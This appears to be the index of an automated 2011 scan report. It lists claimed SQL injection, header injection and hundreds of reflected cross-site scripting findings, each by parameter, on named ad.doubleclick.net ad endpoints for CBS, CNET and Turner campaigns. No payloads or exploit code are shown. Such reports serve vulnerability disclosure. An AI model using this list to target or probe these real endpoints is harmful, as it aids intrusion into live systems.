XSS, HTTP Header Injection, DORK, GHDB, ad.doubleclick.net

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Apr 27 21:06:51 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [b parameter]

1.2. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]

1.3. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]

1.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [orh parameter]

1.5. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pg parameter]

1.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]

1.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sz parameter]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter]

3.2. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter]

3.3. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter]

3.4. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter]

3.5. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter]

3.6. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter]

3.7. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter]

3.8. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter]

3.9. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter]

3.10. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter]

3.11. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter]

3.12. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter]

3.13. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter]

3.14. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter]

3.15. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter]

3.16. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter]

3.17. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter]

3.18. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter]

3.19. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter]

3.20. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter]

3.21. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter]

3.22. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter]

3.23. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter]

3.24. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter]

3.25. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter]

3.26. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter]

3.27. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter]

3.28. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter]

3.29. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter]

3.30. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter]

3.31. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter]

3.32. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter]

3.33. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter]

3.34. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter]

3.35. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter]

3.36. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter]

3.37. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter]

3.38. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter]

3.39. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter]

3.40. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter]

3.41. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter]

3.42. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter]

3.43. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter]

3.44. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter]

3.45. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter]

3.46. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter]

3.47. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter]

3.48. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter]

3.49. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter]

3.50. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter]

3.51. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter]

3.52. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter]

3.53. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter]

3.54. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter]

3.55. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter]

3.56. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter]

3.57. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter]

3.58. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter]

3.59. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter]

3.60. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter]

3.61. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter]

3.62. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter]

3.63. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter]

3.64. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter]

3.65. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter]

3.66. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter]

3.67. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter]

3.68. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter]

3.69. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter]

3.70. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter]

3.71. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter]

3.72. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter]

3.73. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter]

3.74. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter]

3.75. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter]

3.76. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter]

3.77. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter]

3.78. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter]

3.79. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]

3.80. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]

3.81. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter]

3.82. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter]

3.83. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter]

3.84. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]

3.85. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter]

3.86. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter]

3.87. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter]

3.88. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter]

3.89. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter]

3.90. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter]

3.91. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter]

3.92. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter]

3.93. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter]

3.94. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter]

3.95. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter]

3.96. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter]

3.97. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter]

3.98. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter]

3.99. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter]

3.100. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter]

3.101. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter]

3.102. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter]

3.103. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter]

3.104. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter]

3.105. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter]

3.106. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter]

3.107. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter]

3.108. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter]

3.109. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter]

3.110. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter]

3.111. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter]

3.112. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter]

3.113. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter]

3.114. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]

3.115. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]

3.116. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]

3.117. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]

3.118. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]

3.119. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]

3.120. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]

3.121. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]

3.122. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]

3.123. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]

3.124. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]

3.125. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]

3.126. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]

3.127. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]

3.128. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]

3.129. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]

3.130. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]

3.131. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]

3.132. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]

3.133. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]

3.134. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]

3.135. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]

3.136. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]

3.137. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]

3.138. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]

3.139. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]

3.140. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]

3.141. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]

3.142. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]

3.143. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]

3.144. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]

3.145. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]

3.146. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]

3.147. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]

3.148. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]

3.149. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]

3.150. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]

3.151. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]

3.152. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]

3.153. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]

3.154. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]

3.155. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]

3.156. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]

3.157. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]

3.158. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]

3.159. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]

3.160. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]

3.161. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]

3.162. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]

3.163. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]

3.164. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]

3.165. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]

3.166. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter]

3.167. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter]

3.168. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter]

3.169. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter]

3.170. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter]

3.171. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter]

3.172. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter]

3.173. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter]

3.174. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter]

3.175. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter]

3.176. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter]

3.177. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter]

3.178. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter]

3.179. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter]

3.180. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter]

3.181. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter]

3.182. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter]

3.183. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter]

3.184. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter]

3.185. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter]

3.186. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter]

3.187. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter]

3.188. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter]

3.189. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter]

3.190. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter]

3.191. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter]

3.192. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter]

3.193. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter]

3.194. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter]

3.195. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter]

3.196. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter]

3.197. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter]

3.198. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter]

3.199. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter]

3.200. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter]

3.201. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter]

3.202. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter]

3.203. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter]

3.204. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter]

3.205. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter]

3.206. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter]

3.207. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter]

3.208. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter]

3.209. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter]

3.210. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter]

3.211. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pt parameter]

3.212. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ra parameter]

3.213. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [rqid parameter]

3.214. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sg parameter]

3.215. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [site parameter]

3.216. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sz parameter]

3.217. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [t parameter]

3.218. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [b parameter]

3.219. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cid parameter]

3.220. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [count parameter]

3.221. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cpnmodule parameter]

3.222. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [e parameter]

3.223. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [epartner parameter]

3.224. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [event parameter]

3.225. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [h parameter]

3.226. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [l parameter]

3.227. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [nd parameter]

3.228. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [o parameter]

3.229. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [oepartner parameter]

3.230. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [orh parameter]

3.231. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [p parameter]

3.232. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pdom parameter]

3.233. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pg parameter]

3.234. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pid parameter]

3.235. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pp parameter]

3.236. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ppartner parameter]

3.237. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pt parameter]

3.238. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ra parameter]

3.239. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [rqid parameter]

3.240. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sg parameter]

3.241. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [site parameter]

3.242. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sz parameter]

3.243. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [t parameter]

3.244. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [b parameter]

3.245. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cid parameter]

3.246. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [count parameter]

3.247. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cpnmodule parameter]

3.248. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [e parameter]

3.249. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [epartner parameter]

3.250. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [event parameter]

3.251. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [h parameter]

3.252. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [l parameter]

3.253. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [nd parameter]

3.254. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [o parameter]

3.255. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [oepartner parameter]

3.256. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [orh parameter]

3.257. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [p parameter]

3.258. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pdom parameter]

3.259. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pg parameter]

3.260. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pid parameter]

3.261. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pp parameter]

3.262. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ppartner parameter]

3.263. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pt parameter]

3.264. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ra parameter]

3.265. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [rqid parameter]

3.266. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sg parameter]

3.267. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [site parameter]

3.268. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sz parameter]

3.269. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [t parameter]

3.270. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [b parameter]

3.271. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cid parameter]

3.272. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [count parameter]

3.273. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cpnmodule parameter]

3.274. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [e parameter]

3.275. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [epartner parameter]

3.276. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [event parameter]

3.277. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [h parameter]

3.278. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [l parameter]

3.279. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [nd parameter]

3.280. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [o parameter]

3.281. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [oepartner parameter]

3.282. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [orh parameter]

3.283. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [p parameter]

3.284. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pdom parameter]

3.285. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pg parameter]

3.286. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pid parameter]

3.287. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pp parameter]

3.288. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ppartner parameter]

3.289. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pt parameter]

3.290. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ra parameter]

3.291. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [rqid parameter]

3.292. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sg parameter]

3.293. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [site parameter]

3.294. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sz parameter]

3.295. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [t parameter]

3.296. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [b parameter]

3.297. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cid parameter]

3.298. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [count parameter]

3.299. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cpnmodule parameter]

